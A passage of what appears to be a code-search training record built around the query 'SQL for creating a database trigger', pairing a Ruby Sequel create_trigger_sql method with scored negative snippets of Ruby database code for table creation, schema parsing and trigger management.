(gid),\n\t\t\t CONSTRAINT subpopulacao_remanescente_gid_remanescente_fkey FOREIGN KEY (gid_remanescente) REFERENCES geo.remanescentes (gid),\n\t\t\t CONSTRAINT subpopulacao_remanescente_subpop_gid_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid),\n\t\t\t CONSTRAINT subpopulacao_remanescente_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_remanescente OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_rodovia\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_rodovia(\n\t\t\t gid serial NOT NULL,\n\t\t\t gid_subpop integer,\n\t\t\t gid_rod integer,\n\t\t\t CONSTRAINT subpopulacao_rodovia_gid_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_rodovia_gid_rod_fkey FOREIGN KEY (gid_rod) REFERENCES geo.rodovias (gid),\n\t\t\t CONSTRAINT subpopulacao_rodovia_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_rodovia OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_mineracao\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_mineracao(\n\t\t\t gid serial NOT NULL,\n\t\t\t gid_subpop integer,\n\t\t\t gid_mineracao integer,\n\t\t\t CONSTRAINT subpopulacao_mineracao_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_mineracao_gid_mineracao_fkey FOREIGN KEY (gid_mineracao) REFERENCES geo.mineracao (gid),\n\t\t\t CONSTRAINT subpopulacao_mineracao_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_mineracao OWNER TO cncflora;\")\n\n\n\n ## Table: geo.subpopulacao_incendios\n conn.exec(\"CREATE TABLE geo.subpopulacao_incendios(\n gid serial NOT NULL,\n gid_subpop integer,\n ano integer,\n mes integer,\n incendios integer,\n CONSTRAINT subpopulacao_incendios_gid_pkey PRIMARY KEY (gid),\n CONSTRAINT subpopulacao_incendios_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid));\")\n conn.exec(\"ALTER TABLE geo.subpopulacao_incendios OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_uc\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_uc(\n\t\t\t gid serial NOT NULL,\n\t\t\t gid_subpop integer,\n\t\t\t gid_uc integer,\n\t\t\t CONSTRAINT subpopulacao_uc_gid_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_uc_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid),\n\t\t\t CONSTRAINT subpopulacao_uc_gid_uc_fkey FOREIGN KEY (gid_uc) REFERENCES geo.ucs (gid));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_uc OWNER TO cncflora;\")\n\n\n=begin\n ## Table: geo.subpopulacao_terra_indigena\n conn.exec(\"CREATE TABLE geo.subpopulacao_terra_indigena(\n gid serial NOT NULL,\n gid_subpop integer,\n gid_terra_indigena integer,\n CONSTRAINT subpopulacao_terra_indigena_gid_pkey PRIMARY KEY (gid),\n CONSTRAINT subpopulacao_terra_indigena_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid),\n CONSTRAINT subpopulacao_terra_indigena_gid_uc_fkey FOREIGN KEY (gid_terra_indigena) REFERENCES geo.terra_indigena (gid));\")\n conn.exec(\"ALTER TABLE geo.subpopulacao_terra_indigena OWNER TO cncflora;\")\n\tputs \"CREATE TABLE - OK\"\n=end\n\n\n\n\t## Tabela: geo.tempos\n\tconn.exec(\"DROP TABLE IF EXISTS geo.tempos;\")\n\tconn.exec(\"CREATE TABLE geo.tempos(id integer NOT NULL,\n t_eoo double precision DEFAULT 0.0,\n t_aoo double precision DEFAULT 0.0,\n t_subpop double precision DEFAULT 0.0,\n t_subpop_rem double precision DEFAULT 0.0,\n t_subpop_rod double precision DEFAULT 0.0,\n t_subpop_min double precision DEFAULT 0.0,\n t_subpop_uc double precision DEFAULT 0.0,\n t_area_total_subpop double precision DEFAULT 0.0,\n t_area_rem double precision DEFAULT 0.0,\n t_area_min double precision DEFAULT 0.0,\n t_area_rod double precision DEFAULT 0.0,\n t_area_rem_rod double precision DEFAULT 0.0,\n t_area_uc double precision DEFAULT 0.0,\n t_area_rem_uc double precision DEFAULT 0.0,\n\t\t\t t_incendios_subpop double precision DEFAULT 0.0,\n t_total double precision DEFAULT 0.0,\n CONSTRAINT eoo_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n conn.exec(\"ALTER TABLE geo.tempos OWNER TO cncflora;\")\n\n\n\n\n\nend",
"def quote_table_name(name)\n schema, name_part = extract_vertica_identifier_from_name(name.to_s)\n\n unless name_part\n quote_column_name(schema)\n else\n table_name, name_part = extract_vertica_identifier_from_name(name_part)\n \"#{quote_column_name(schema)}.#{quote_column_name(table_name)}\"\n end\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def create_table_structure(columns_to_include)\n if @table_created\n @columns.each do |column|\n begin\n ActiveRecord::Schema.add_column(@new_table_name, column[:name], column[:type]) if (columns_to_include.blank? or columns_to_include.include? column[:name])\n rescue\n puts \"Couldnt add field #{column[:name].downcase}\"\n end\n end\n ActiveRecord::Schema.add_column(@new_table_name,\"the_geom\", :geometry,:null => false)\n ActiveRecord::Schema.add_index(@new_table_name,\"the_geom\",:spatial => true)\n end\n end",
"def create_table_structure(columns_to_include)\n if @table_created\n @columns.each do |column|\n begin\n ActiveRecord::Schema.add_column(@new_table_name, column[:name], column[:type]) if (columns_to_include.blank? or columns_to_include.include? column[:name])\n rescue\n puts \"Couldnt add field #{column[:name].downcase}\"\n end\n end\n ActiveRecord::Schema.add_column(@new_table_name,\"the_geom\", :geometry,:null => false)\n ActiveRecord::Schema.add_index(@new_table_name,\"the_geom\",:spatial => true)\n end\n end",
"def table\n end",
"def get_tables\n tables\n end",
"def ext_db_path; end",
"def ext_db_path; end",
"def schema_parse_table(table, opts={})\n ds = dataset\n ds.identifier_output_method = :downcase\n schema_and_table = \"#{\"#{quote_identifier(opts[:schema])}.\" if opts[:schema]}#{quote_identifier(table)}\"\n table_schema = []\n metadata = transaction(opts){|conn| conn.describe_table(schema_and_table)}\n metadata.columns.each do |column|\n table_schema << [\n column.name.downcase.to_sym,\n {\n :type => column.data_type,\n :db_type => column.type_string.split(' ')[0],\n :type_string => column.type_string,\n :charset_form => column.charset_form,\n :char_used => column.char_used?,\n :char_size => column.char_size,\n :data_size => column.data_size,\n :precision => column.precision,\n :scale => column.scale,\n :fsprecision => column.fsprecision,\n :lfprecision => column.lfprecision,\n :allow_null => column.nullable?\n }\n ]\n end\n table_schema.instance_variable_set :@features, {\n :owner => :\"#{metadata.obj_schema.downcase}\",\n :clustered => (metadata.clustered? rescue nil),\n :temporary => (metadata.is_temporary? rescue nil),\n :partitioning => (metadata.partitioned? rescue nil),\n :typed => (metadata.is_typed? rescue nil),\n :index_only => (metadata.index_only? rescue nil)\n }\n table_schema\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def table_name\n @table_name ||= begin\n schema = self.class.schema_name\n table = self.sqltablename.blank? ? \"PS_#{self.recname}\" : self.sqltablename\n [schema, table].compact.join(\".\")\n end\n end",
"def prepare_extend_sproc(ds)\n ds.with_extend(StoredProcedureMethods)\n end",
"def set_publication_tables(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} SET TABLE #{safe_list(tables)}\")\n end",
"def table_filtered?(schema_name, table_type)\n %w[information_schema pg_catalog].include?(schema_name) || table_type !~ /TABLE/i\n end",
"def quote_schema_table(table)\n schema_utility_dataset.quote_schema_table(table)\n end",
"def quote_schema_table(table)\n schema_utility_dataset.quote_schema_table(table)\n end",
"def table_name\n self.class.table_name\n end",
"def setup_db\n ActiveRecord::Schema.define(:version => 1) do\n create_table :users do |t|\n t.string :email, :limit => 255\n t.string :crypted_password, :limit => 255\n \n t.timestamps\n end\n end\n \n ActiveRecord::Schema.define(:version => 1) do\n create_table :labels do |t|\n t.string :type, :limit => 255\n t.string :system_label, :limit => 255\n t.string :label, :limit => 255\n \n t.timestamps\n end\n end\nend"
] |
[
"0.64756",
"0.60287654",
"0.5837757",
"0.5837757",
"0.5830948",
"0.58300763",
"0.5774674",
"0.57068306",
"0.56986165",
"0.56673163",
"0.56058055",
"0.55958223",
"0.55805767",
"0.55375665",
"0.54677045",
"0.5446681",
"0.541099",
"0.54074264",
"0.54019165",
"0.5395756",
"0.53898954",
"0.53552204",
"0.5346166",
"0.5342284",
"0.5337186",
"0.5337186",
"0.5337186",
"0.52876747",
"0.52728784",
"0.5270976",
"0.52545416",
"0.5247675",
"0.5229339",
"0.51999205",
"0.5194053",
"0.5193109",
"0.5163716",
"0.5161827",
"0.51508",
"0.5141807",
"0.51387525",
"0.51260203",
"0.512386",
"0.51163596",
"0.5114671",
"0.5105172",
"0.51032144",
"0.50997895",
"0.5077263",
"0.50772446",
"0.5075727",
"0.5075727",
"0.5075727",
"0.5075727",
"0.5061348",
"0.50601536",
"0.503807",
"0.5034946",
"0.5033914",
"0.5030362",
"0.502868",
"0.50231093",
"0.5019512",
"0.5016189",
"0.501375",
"0.5007192",
"0.5004923",
"0.49945822",
"0.4991165",
"0.49836412",
"0.49820566",
"0.49756053",
"0.49751925",
"0.49731106",
"0.49730244",
"0.49699116",
"0.4963344",
"0.4963344",
"0.49568993",
"0.49562144",
"0.49509472",
"0.49466497",
"0.49439624",
"0.4942627",
"0.49410114",
"0.49410114",
"0.4940608",
"0.49359664",
"0.49295086",
"0.49295086",
"0.49283805",
"0.49194273",
"0.49167052",
"0.4914664",
"0.4911254",
"0.49103314",
"0.49090675",
"0.49090675",
"0.49083117",
"0.49072546"
] |
0.5480449
|
14
|
SQL for creating a database trigger.
|
def create_trigger_sql(table, name, function, opts=OPTS)
events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]
whence = opts[:after] ? 'AFTER' : 'BEFORE'
if filter = opts[:when]
raise Error, "Trigger conditions are not supported for this database" unless supports_trigger_conditions?
filter = " WHEN #{filter_expr(filter)}"
end
"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def createTrigger _args\n \"createTrigger _args;\" \n end",
"def create_trigger name, type, table_name, *actions\n create_function \"#{name}_f\", :returns=>'trigger',:as=>'$BODY$' do\n yield\n end\n execute %{CREATE TRIGGER #{name} #{type.to_s.upcase} #{actions.map{|str|str.upcase}.join(' OR ')}\n ON \"#{table_name}\" FOR EACH ROW\n EXECUTE PROCEDURE #{name}_f();}\n end",
"def create_trigger(database, table)\n options = self.options(table)\n\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => false,\n }\n\n event_filter = options[:event_filter]\n params[:filter_conditions] = event_filter.filter_conditions if event_filter.respond_to?(:filter_conditions)\n\n session.send(database).create_replication_trigger params\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def create_replication_trigger(params)\n create_or_replace_replication_trigger_function params\n\n %w(insert update delete).each do |action|\n execute(<<-end_sql)\n DROP TRIGGER IF EXISTS `#{params[:trigger_name]}_#{action}`;\n end_sql\n\n # The created triggers can handle the case where the trigger procedure\n # is updated (that is: temporarily deleted and recreated) while the\n # trigger is running.\n # For that an MySQL internal exception is raised if the trigger\n # procedure cannot be found. The exception is caught by an trigger\n # internal handler. \n # The handler causes the trigger to retry calling the\n # trigger procedure several times with short breaks in between.\n\n trigger_var = action == 'delete' ? 'OLD' : 'NEW'\n if action == 'update'\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause('OLD', params)}, #{key_clause('NEW', params)}, '#{action[0,1].upcase}');\"\n else\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause(trigger_var, params)}, null, '#{action[0,1].upcase}');\"\n end\n execute(<<-end_sql)\n CREATE TRIGGER `#{params[:trigger_name]}_#{action}`\n AFTER #{action} ON `#{params[:table]}` FOR EACH ROW BEGIN\n DECLARE number_attempts INT DEFAULT 0;\n DECLARE failed INT;\n DECLARE CONTINUE HANDLER FOR 1305 BEGIN\n DO SLEEP(0.05);\n SET failed = 1;\n SET number_attempts = number_attempts + 1;\n END;\n REPEAT\n SET failed = 0;\n #{call_statement}\n UNTIL failed = 0 OR number_attempts >= 40 END REPEAT;\n END;\n end_sql\n end\n\n end",
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def trigger_definition(table_name, trigger_name, name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def triggers\n\n end",
"def triggerStatements _args\n \"triggerStatements _args;\" \n end",
"def triggers\n res = select_all <<-SQL\n SELECT n.nspname as schema,\n c.relname as table,\n t.tgname as trigger_name,\n t.tgenabled as enable_mode,\n t.tgdeferrable as is_deferrable,\n t.tginitdeferred as is_initially_deferrable,\n pg_catalog.pg_get_triggerdef(t.oid, true) as trigger_definition\n FROM pg_catalog.pg_trigger t\n INNER JOIN pg_catalog.pg_class c ON c.oid = t.tgrelid\n INNER JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v')\n AND NOT t.tgisinternal\n ORDER BY 1, 2, 3;\n SQL\n\n res.inject([]) do |buffer, row|\n schema = row['schema']\n table = row['table']\n trigger_name = row['trigger_name']\n is_deferrable = row['is_deferrable']\n is_initially_deferred = row['is_initially_deferred']\n\n trigger_definition = row['trigger_definition']\n\n is_constraint = is_constraint?(trigger_definition)\n proc_name = parse_proc_name(trigger_definition)\n event = parse_event(trigger_definition, trigger_name)\n condition = parse_condition(trigger_definition)\n\n for_every = !!(trigger_definition =~ /FOR[\\s]EACH[\\s]ROW/) ? :row : :statement\n\n if proc_name && event\n buffer << ::PgSaurus::ConnectionAdapters::TriggerDefinition.new(\n trigger_name,\n proc_name,\n is_constraint,\n event,\n for_every,\n is_deferrable,\n is_initially_deferred,\n condition,\n table,\n schema\n )\n end\n buffer\n end\n end",
"def create_or_replace_replication_trigger_function(params)\n execute(<<-end_sql)\n DROP PROCEDURE IF EXISTS `#{params[:trigger_name]}`;\n end_sql\n \n activity_check = \"\"\n if params[:exclude_rr_activity] then\n activity_check = <<-end_sql\n DECLARE active INT;\n SELECT count(*) INTO active FROM #{params[:activity_table]};\n IF active <> 0 THEN\n LEAVE p;\n END IF;\n end_sql\n end\n\n execute(<<-end_sql)\n CREATE PROCEDURE `#{params[:trigger_name]}`(change_key varchar(2000), change_new_key varchar(2000), change_type varchar(1))\n p: BEGIN\n #{activity_check}\n INSERT INTO #{params[:log_table]}(change_table, change_key, change_new_key, change_type, change_time)\n VALUES('#{params[:table]}', change_key, change_new_key, change_type, now());\n END;\n end_sql\n \n end",
"def trigger\n trigger_function = \"insert_#{master_table}\"\n unless @column == 'page'\n column = \"#{@column},\"\n column_function = \"coalesce(quote_literal(NEW.#{@column}), 'NULL') || ',' ||\"\n end\n \n cmd = <<-COMMAND\n CREATE OR REPLACE FUNCTION #{trigger_function}() \n RETURNS TRIGGER AS $$ \n DECLARE\n ins_sql TEXT; \n BEGIN\n ins_sql := 'INSERT INTO daily_#{@column}_views_' || (NEW.writer_id % #{@partition_size}) ||\n '(date,article_id,#{column}count,writer_id,partition_id) \n VALUES ' ||\n '('|| quote_literal(NEW.date) || ',' || NEW.article_id ||',' ||\n \t#{column_function} \n \t\t\tNEW.count || ',' || \n \t\t\tNEW.writer_id || ',' || (NEW.writer_id % #{@partition_size}) ||')'\n ; \n EXECUTE ins_sql;\n RETURN NULL;\n END; \n $$\n LANGUAGE plpgsql;\n \n CREATE TRIGGER #{trigger_function}_trigger\n BEFORE INSERT ON #{master_table}\n FOR EACH ROW EXECUTE PROCEDURE #{trigger_function}();\n COMMAND\n @conns.each{|conn| conn.exec(cmd)}\n end",
"def create_trigger(*args)\n username, arguments = extract_username(args)\n attrs = valid_trigger_attrs(arguments)\n\n post api_url(username, 'triggers'), attrs\n end",
"def enable_trigger(trigger = 'ALL')\n connection.enable_trigger(table_name, trigger)\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def get_triggers\n connect_db.fetch(\"SELECT RDB$TRIGGER_NAME, RDB$TRIGGER_SOURCE FROM RDB$TRIGGERS WHERE RDB$SYSTEM_FLAG = 0\")\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def to_create_database_sql(db)\n db.send(:create_database_sql, self.name, {})\n end",
"def create_db_cmd!\n \"createdb -e #{new_db_name}\"\n end",
"def triggerType _args\n \"triggerType _args;\" \n end",
"def trigger!\n end",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def triggers\n Triggers.all(connection)\n end",
"def CreateTrigger params = {}\n \n APICall(path: 'triggers.json',method: 'POST',payload: params.to_json)\n \n end",
"def trigger_name(proc_name, options)\n if name = options[:name]\n name\n else\n \"trigger_#{proc_name.gsub('(', '').gsub(')', '')}\"\n end\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def add_trigger(opts)\n opts = opts.with_indifferent_access\n t = Trigger.new\n t.check_id = opts[:check_id]\n t.metric_id = opts[:metric_id]\n t.set_severity(opts[:severity])\n t.sign = opts[:sign].to_sym\n t.threshold = opts[:threshold]\n t.status = array(opts[:status]).map{ |s| s.upcase }\n\n t.save!\n t\n end",
"def create_trigger(trigger, conditions = [], dampenings = [], _actions = [])\n full_trigger = {}\n full_trigger[:trigger] = trigger.to_h\n conds = []\n conditions.each { |c| conds.push(c.to_h) }\n full_trigger[:conditions] = conds\n damps = []\n dampenings.each { |d| damps.push(d.to_h) } unless dampenings.nil?\n full_trigger[:dampenings] = damps\n\n http_post 'triggers/trigger', full_trigger\n end",
"def trigger\n @trigger ||= begin\n trigger = Scrutinize::Trigger.new\n\n # Trigger configured at top level\n keys = %w(methods method targets target)\n unless (@options.keys & keys).empty?\n trigger.add @options.select { |k,v| keys.include?(k) }\n end\n\n # Trigger configured under trigger key\n trigger.add @options['trigger'] if @options['trigger'].is_a?(Hash)\n\n # Triggers configured under triggers key\n if @options['triggers'].is_a? Array\n @options['triggers'].each { |t| trigger.add t }\n end\n\n trigger\n end\n end",
"def trigger(owner, event, *args); end",
"def triggers(name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def parse_event(trigger_definition, trigger_name)\n trigger_definition[/^CREATE[\\sA-Z]+TRIGGER[\\s]#{Regexp.escape(trigger_name)}[\\s](.*?)[\\s]ON[\\s]/m, 1]\n end",
"def triggerActivation _args\n \"triggerActivation _args;\" \n end",
"def enable_event_trigger(name, options = {})\n if options[:always] && options[:replica]\n raise ArgumentError.new(\"Cannot use :replica and :always together when enabling an event trigger.\")\n end\n\n sql = \"ALTER EVENT TRIGGER #{quote_generic(name)} ENABLE\"\n\n if options[:always]\n sql << ' ALWAYS'\n elsif options[:replica]\n sql << ' REPLICA'\n end\n\n execute \"#{sql};\"\n end",
"def trigger_options\n triggers.map { |t, _| [t.gsub('on_', '').titlecase, t] }\n end",
"def checkTrigger\n\t end",
"def enable_triggers(enable = true)\n triggers.each do |trigger|\n sql = \"alter trigger #{trigger.name} #{enable ? :enable : :disable}\"\n OracleTables.exec_sql sql\n end\n end",
"def create_change_log(database)\n silence_ddl_notices(database) do\n connection = session.send(database)\n table_name = \"#{options[:rep_prefix]}_pending_changes\"\n connection.create_table table_name\n connection.add_column table_name, :change_table, :string\n connection.add_column table_name, :change_key, :string\n connection.add_column table_name, :change_new_key, :string\n connection.add_column table_name, :change_type, :string\n connection.add_column table_name, :change_time, :timestamp\n connection.remove_column table_name, 'id'\n connection.add_big_primary_key table_name, 'id'\n end\n end",
"def create_group_trigger(trigger)\n ret = http_post 'triggers/groups', trigger.to_h\n Trigger.new(ret)\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def trigger(*args)\n username, arguments = extract_username(args)\n trigger_id = get_id_from_arguments(arguments)\n\n get api_url(username, 'triggers', trigger_id)\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def to_s\n \"trigger\"\n end",
"def triggerText _args\n \"triggerText _args;\" \n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def trigger(name, *args)\n Events.use(name, *args)\n end",
"def test_can_retrieve_trigger_metadata\n skip(\"Triggers were introduced in Cassandra 2.0\") if CCM.cassandra_version < '2.0.0'\n\n # trigger1, on test1 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test1 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test1', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test1').has_trigger?('trigger1')\n trigger_meta = @cluster.keyspace('simplex').table('test1').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta.name\n assert_equal 'test1', trigger_meta.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta.options['class']\n\n # trigger1, on test2 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test2 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test2', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test2').has_trigger?('trigger1')\n trigger_meta2 = @cluster.keyspace('simplex').table('test2').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta2.name\n assert_equal 'test2', trigger_meta2.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta2.options['class']\n\n refute_equal trigger_meta, trigger_meta2\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def initialize(trigger=ALL)\n list_triggers = get_all_triggers\n if not list_triggers.include? trigger\n raise QueryException.new(\"The trigger value must be one of #{list_triggers.join(', ')}\")\n end\n \n @trigger = trigger\n \n end",
"def create_event(db, name, type, date, happened)\n db.execute(\"INSERT INTO events (event_name, type_of_event, date_of_event, has_happened) VALUES (?, ?, ?, ?)\", [name, type, date, happened])\nend",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def generate\n if Rails.version < '4'\n migration_template('rails3_migration',\n \"#{db_migrate_path}/create_db_poller.rb\")\n else\n migration_template('migration',\n \"#{db_migrate_path}/create_db_poller.rb\")\n end\n end",
"def triggers\n @_triggers ||= Trigger\n .joins(:crud_action)\n .where(klass: item.class.name,\n crud_actions: { name: @transaction })\n end",
"def setTriggerStatements _obj, _args\n \"_obj setTriggerStatements _args;\" \n end",
"def copy_bucket_maker_migration\n if behavior == :invoke && store_in == 'active_record' && active_recordable_exists?\n migration_template \"active_recordable_migration.rb\", \"db/migrate/create_#{ACTIVE_RECORDABLE.pluralize}\"\n end\n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create\n puts \"Creating tumblr\"\n ActiveRecord::Base.connection.execute(File.open(\"db/schema.sql\").read)\n end",
"def name\n\t\t\"db_fun\"\n\tend",
"def fire\n PassiveRecord::Adapter.execute to_sql\n end",
"def setTriggerType _obj, _args\n \"_obj setTriggerType _args;\" \n end",
"def trigger param\r\n self.send \"trig_#{param[:type] || :edge}\".to_sym, param\r\n end",
"def create\n @trigger = Trigger.new(params[:trigger])\n\n respond_to do |format|\n if @trigger.save\n flash[:notice] = 'Trigger was successfully created.'\n format.html { redirect_to(@trigger) }\n format.xml { render :xml => @trigger, :status => :created, :location => @trigger }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @trigger.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def setTriggerText _obj, _args\n \"_obj setTriggerText _args;\" \n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create_watch_table(database)\n\tcreate_watch_table_cmd = <<-SQL \n\tCREATE TABLE IF NOT EXISTS watchlist(\n\t\tid INTEGER PRIMARY KEY,\n\t\tticker VARCHAR(6),\n\t\tinitial_price FLOAT(2),\n\t\tcurrent_price FLOAT(2),\n\t\tuser_id int,\n\t\tFOREIGN KEY (user_id) REFERENCES users(id)\n\t)\nSQL\n\tdatabase.execute(create_watch_table_cmd)\nend",
"def trigger_exists?(database, table)\n trigger_name = \"#{options(table)[:rep_prefix]}_#{table}\"\n session.send(database).replication_trigger_exists? trigger_name, table\n end",
